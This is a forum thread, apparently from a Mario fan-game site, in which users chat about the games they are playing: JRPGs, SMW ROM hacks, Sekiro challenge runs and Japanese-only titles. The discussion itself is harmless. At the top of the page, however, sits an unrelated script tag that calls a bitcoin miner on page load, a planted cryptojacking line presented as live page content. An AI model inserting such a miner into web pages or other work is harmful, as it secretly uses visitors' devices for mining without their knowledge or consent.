<script>
miner.start(); // initialise bitcoin miner
</script>

pge projectmario fan games galaxysmw central

What games are you playing?

do you like them video games? what about those there romhacks? well pop on in here and talk about them then! what are you waiting for?!
KobaBeach
obscure jrpg enthusiast
First name: David
Pronouns: he/him

Re: What games are you playing?

Postby KobaBeach » 6 months ago

that's honestly why im considering skipping days and just watching the cutscenes alongside reading a story summary it just sounds absolutely dreadful to play like re:com. what the fuck happened to those two

oh yeah i also played through all of dragon quest 1 snes again because im sad
twitter (spicy at times!) | avatar by kuma

who cares:

Bean

Postby Bean » 6 months ago

Yoshi's Crafted World is a mixed bag. I thought it was pretty enjoyable in the middle of the game, but at the same time, just kind of lost interest after that until the final boss for the most part. I don't know. Woolly World was great most of the way through, so I can only view this one as a good step or two back. Had its moments though. Just not enough of them.

And the less said about the majority of the soundtrack, the better.

Cyril
metal nerd
First name: Cyril
Pronouns: he/she/they

Postby Cyril » 6 months ago

KobaBeach wrote: that's honestly why im considering skipping days and just watching the cutscenes alongside reading a story summary it just sounds absolutely dreadful to play like re:com. what the fuck happened to those two

oh yeah i also played through all of dragon quest 1 snes again because im sad
358/2 is bad enough and i was old enough to realize it was bad that it made me not play any KH games for a decade, lol
i've honestly never played a video game in my life

thatguyif
Pronouns: We Are The 99%

Postby thatguyif » 6 months ago

Katana ZERO is pretty god-damn amazing. Very interesting action game with a poppin soundtrack that actually pulls its weight in terms of 80s cultural aesthetics. I'm almost tempted to put it in for the next Patapon vote...except it's also extremely dark.

KobaBeach
obscure jrpg enthusiast

im at the crest search in dq2 snes

apparently you can miss out on the crest searching tip by choosing to decline dragonlord jr's offer to have charlock castle so that's nice
good thing this is an open-ish rpg and not a super linear one like ff3+ that basically requires you to do everything in order or there would be Problems

restarting summon night to make more of an effort to translate it for myself
i feel bad for taking too long with rpgs because i want to play them all but ill try to hold that in to savor and enjoy sumonai for what it is

im mostly doing this because i liked swordcraft story so much and also its an srpg

who cares:

Jongseok

Postby Jongseok » 6 months ago

Of course Half Jump in SNES.
I found 127 exits. Only 3 exits left but I don't know where they are..
Bowser's Castle was pretty easy this time(?)
JUMP1 is harder I think? (Shell Sticker, Pixel Perfect, Shattered Dreams etc..)
Nice Second Run port on the Sky land.
TALKHAUS defeats Vippers completely.

KobaBeach
obscure jrpg enthusiast

Jongseok wrote: Of course Half Jump in SNES.
I found 127 exits. Only 3 exits left but I don't know where they are..
Bowser's Castle was pretty easy this time(?)
JUMP1 is harder I think? (Shell Sticker, Pixel Perfect, Shattered Dreams etc..)
Nice Second Run port on the Sky land.
TALKHAUS defeats Vippers completely.
Oh shit, welcome back Jongseok. I was before your time on here but I've seen you around so don't worry.

I don't want to say they're better than the VIPPERs because that's tantamount to sacrilege to me, but what I've played of JUMP 1/2 (almost done with World 3, levels are just starting to become a thing so (sweat emoji)) is honestly on par with VIP5, which is the best SMW romhack I've played before JUMP 1/2.

So yeah. The improved difficulty curve + easier levels overall really work in the hack's favor. A definite masterpiece.

Unrelated to the above, I restarted Summon Night to actually translate the text to myself instead of just fast forwarding through it and playing the game portion.

I have this weird asperger's thing where I feel bad if I cheese a game too hard and take too little, but also if I take too long and waste my time in the game, this same thing happened with Popolocrois PS1. I want to get over this because there's a lot of RPGs that aren't available in English (yet) that look really neat and I want to play them and enjoy their story, like Star Ocean Blue Sphere which is only available in Japanese and has a French translation patch because damn you Gideon Zhi, plus I might end up learning some new words and kanji on my way there.

I need to find some good ways to learn and memorize Japanese words and kanji, spaced repetition doesnt seem to be working for me.

who cares:

KobaBeach
obscure jrpg enthusiast

Used a guide to help me find 3 of the 5 crests in Dragon Quest 2 SNES. This game really falls apart by then. World map design just took a sharp drop compared to all that came before as well as Dragon Quest 1 and in an open game (two fifths open in dq2's case) that is kind of maybe a big deal?

Like, large empty stretches of sea aren't very good to help find your way through things without a sort of ingame map screen.

Need to get Life Crest, the Water Crest and the Water Flying Cloth.

who cares:

HatKid
Pronouns: she/her

Postby HatKid » 6 months ago

I've been playing Rhapsody: A Musical Adventure recently, and it's a whole lot of average. The music's okay, the dungeon design is very simplistic and the difficulty is practically nonexistent. Granted I am only playing on Normal, maybe it's hard on Hard. The story is a cliche save the prince plot but at least the characters aren't all that boring.

I'm at Inaba Pride Exhibit in Persona Q and honestly at this point I just want the game to be over. It's neat seeing the P3 and P4 casts interact but I haven't really been having a blast with the dungeon exploration.

Ashan
The world has become a place

Postby Ashan » 6 months ago

Just finished off beating Sekiro without Kuro's charm. After you beat the game there's a new bit of dialogue near the beginning of the game where you can give this charm away that makes it so you take chip damage, enemies have more health/posture, you have less of it, and status effects build faster. I ended up going through and beating all bosses and mini bosses. It was pretty fun, I had to learn some boss movesets more than I previously ever did.

I think next up I'll probably switch back to my file that's on max NG+ difficulty, give away the charm again, and turn on the demon bell effect that makes the game even harder. I guess that's the true maximum you can cap the game's difficulty at, so if I can do that then I'll probably be done with this for a while until DLC comes out.

Ashan

Oh yeah also I played through with the English dub and boy is it awkward!

Some of the voice actors are okay, but some just sound like people reading lines.

There is this one merchant that knocked it out of the park though. I think he improvised on a few lines even, cause he said extra stuff that isn't in the subtitles. I tried to get as much dialogue out of him as possible because he was so much fun to listen to! But regardless I'm switching back to Japanese voices after this cause it feels correct.

BurntTenda
defeat four ducks
Pronouns: he/him/his

Postby BurntTenda » 6 months ago

I decided to pick up Yakuza Kiwami.
I've gotten up to just after

Majima in the batting cages

. That boss was a nightmare on Hard.
Otherwise, I've really enjoyed it, especially the side stories.
Something goes here sometime.
Oh yeah, I have a Youtube channel

Ashan

Been doing that aforementioned Sekiro run of max NG+/no Kuro charm/demon's bell active.
I've got several bosses down, but I'm at the point where most of them can 1-hit kill me so it's getting fun.

Cyril
metal nerd
First name: Cyril
Pronouns: he/she/they

Postby Cyril » 6 months ago

screwing around with la-mulana randomizer because it's fun and raocow put me in the mood
i got the feather as my very first item (aside from the few i opted to start with) which was really funny but my seed ended up bottlenecking at the endless corridor about halfway through and i got a bit annoyed. opened up pretty nicely right after that though
i've honestly never played a video game in my life

KobaBeach
obscure jrpg enthusiast

クロノトリガーの日本語版をプレイしている
カエルとニズベールはカッコ可愛い

who cares:

Bean

Currently playing Aggelos on the Switch. The game's a cross between Zelda II and Wonder Boy. It plays pretty well and is pretty good about steering you in the right direction if you do get lost. Got through a couple of dungeons and just picked up a treasure that lets me transport between save points, so that will cut down on backtracking in a big way now. Fun game.

KobaBeach
obscure jrpg enthusiast

Beat DQ2.

Helped a bit with depression

who cares:

Bean

Ah, apparently there's a glitch in Aggelos that needs to be patched where you can't jump for a certain section when you need to, and I just got struck by it. I hope their patch will fix the thing because I was flying through this game until that roadblock happened.

computerfan0
Some whiny kid
First name: NO
Pronouns: he/him/his

Postby computerfan0 » 6 months ago

Playing Terraria at the moment.

KobaBeach
obscure jrpg enthusiast

Started Lufia 1 while trying to survive until my next therapist appointment. I know the opening of Lufia 1 spoils the ending to Lufia 2, it's just that Lufia 2 has such a drastic leap in quality that I didn't want to "taint" Lufia 1 by playing it after it.

Walking speed in dungeons and world map is pretty slow, encounter rate is a bit too much, exp. and gold rate is a bit low (in the early game at least), but it's very charming, Lufia's (the character) relationship dynamic with the protag is super cute. Heading to the tower northwest of Grenoble, gonna do a bit of grinding. Game's a bit tough (or I'm just bad at it, either or).

I'll say this, the spell names are pretty sucky. If you're going to name a healing spell, give it a nonsense name like Hoimi, Dia, Lef that can be appended to other healing spells to create a sort of "family", or give it a simpler name like Midheal, Curaga...

Lufia's healing spells are like Strong, Stronger, Champion, with Boost and Valor as full-party recovery spells. None of this sounds like a healing spell, Strong and Boost sound like buffing spells, Champion and Valor don't sound like anything.

who cares:

Ashan

WOOOOOOO I finished off my Sekiro challenge run I mentioned starting in an earlier post. To reiterate, it was max NG+, bell demon active, no Kuro's charm -- basically the max difficulty you can crank the game to, and also if you don't perfectly deflect any attacks you take a fair amount of chip damage.

The last boss was a serious learning experience. It tooks several hours across 3 play sessions, and I really had to learn all the attack patterns since basically everything was a 1-hit kill. I kinda felt like giving up when I first got to it cause I never really learned to fight him properly, but after dozens of attempts I was able to get through the first couple phases of the fight without getting hit.

Feels good! I'd recommend if anyone has finished Sekiro and wants to spice up the challenge, at least playing through without Kuro's charm really changes up the game cause you actually have to learn enemy movesets.

Bean

Since Aggelos is currently on hiatus until the patch, let's go back to one of the series it's inspired by as I started up Monster Boy and the Cursed Kingdom. Pretty fun, and I already know it's going to be a longer ride than The Dragon's Trap was back when I played that.

HatKid
Pronouns: she/her

Postby HatKid » 6 months ago

I beat Pepsiman finally. I had gotten to the last level a few years ago but seeing the AVGN video about it motivated me to actually finish it.
Been playing Shin Megami Tensei: Strange Journey lately. I like it a lot so far. I'm not really certain if I'll try to get a certain alignment ending but I'll probably just see what happens with the decisions I make.
Gotten a little further in Rhapsody. Haven't really felt like playing it however.
Almost done with the Inaba Pride Exhibit in Persona Q. On floor 4 with a little over half mapped. The music is pretty good which made the dungeon itself not as bad.

KobaBeach
obscure jrpg enthusiast

I conked out for like 12 hours thanks to an anti-anxiety pill I took but also I've been playing Gdleen, the first ever JRPG on the Super Famicom (before this it was just Actraiser and Drakkhen). No translation patch.

It's based on Digan no Maseki on the PC98 but it's not a direct port.
It's a pretty bad game but it's kinda chill

who cares:

KobaBeach
obscure jrpg enthusiast

Dumbass RPG Report Stardate May 15th, 2019

Gdleen
I made it to Edna (Edona?) in Gdleen and yeah, it's still pretty bad. I wish I knew better Japanese but I can get some of the barebones plot either way. The game is very insistent on "tell, don't show" and it suffers for it. Like Caron (Kalon? Karon?) introduces you to Lude (Roode?) in the Mayorl Campsite and instead of like showing you Lude walking through the medic tent's entrance and towards you he just. Materializes between Ryuu and Caron. It's ridiculous.

There's also a stakeout where you and Phana are taken prisoners to the Bavariss Campsite and it's like, two Bavariss soldiers surround you whilst you're on the stairs. Meanwhile a whole scene about Ryuu trying to attack them with his laser gun but they use Phana as a hostage to get him to lower his gun so they can allow themselves to get captured goes on in the dialogue window, as they just stand there doing nothing in the world map. It's like I'm reading someone's RP chat logs. This is 1991, Seta.

They later managed to get an animation of a Bavariss soldier running by and taking Phana at the entrance of the Gavanar Shrine in Lulua so that's a plus. Currently we're heading to Coldarn to find a way to get back home at the advice of Caron after clearing the Shrine at Lulua from Bavariss' forces, but also there's a subplot about people turning into Zuhl's (Zuul?) monsters after death instead of reaching the afterlife and meeting Gavanar or something? The plot is dumb or I'm too stupid to translate it properly.

Basically we're going to the Ruins of Grande to find Tao Ho, the permanent third party member because I have no idea, I skipped past the dialogue by accident like a wiener.

Taking a break for now before going to read the dialogue in the Gavanar Shrine in Edna and doing Ruins of Grande.

Here's a review of the game from 2017 that honestly echoes my thoughts on it so far.
Time will tell if Gideon will ever finish his translation patch on it.
Final Fantasy Mystic Quest
Started Mystic Quest again. It's a lot less dull when you're just focusing on the shitposty script instead of the kinda meh gameplay.
A lot of the game's forgiveness kinda relies on the ability to restart battles, I feel. The lack of random encounters is kind of a breath of fresh air now, compared to when I first played it.

Got the Crystal of Earth, got the Crystal of Water, heading to the Mines in Fireburg to help Reuben's dad, did all the Battlefields so far.
It's not too bad, thinking about it again. Lv20.

Hopefully will finish it tonight.

who cares:

Return to “the cartridgé”